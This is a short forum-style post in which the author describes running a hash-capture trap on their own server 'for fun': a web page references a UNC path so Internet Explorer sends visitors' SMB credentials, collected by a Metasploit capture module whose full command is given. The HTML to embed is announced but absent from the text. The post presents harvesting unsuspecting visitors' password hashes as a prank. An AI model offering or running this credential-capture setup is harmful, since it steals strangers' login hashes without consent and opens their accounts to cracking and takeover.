I like leaving this enabled on my VPS just for fun sometimes. You can capture people's SMB hashes remotely using a UNC path to reference resources. So when your browser loads my page, it sees the resource that it thinks exists on some SMB server somewhere, and IE will automatically throw its credentials at it. IE does this for a "seamless user experience". Well, luckily that means for us a "seamless user pwn".
So on your VPS, modify index.html at the root of your web server to include this:
and then run as root:
msfcli auxiliary/server/capture/smb JOHNPWFILE='/root/testsmbcapturefile' E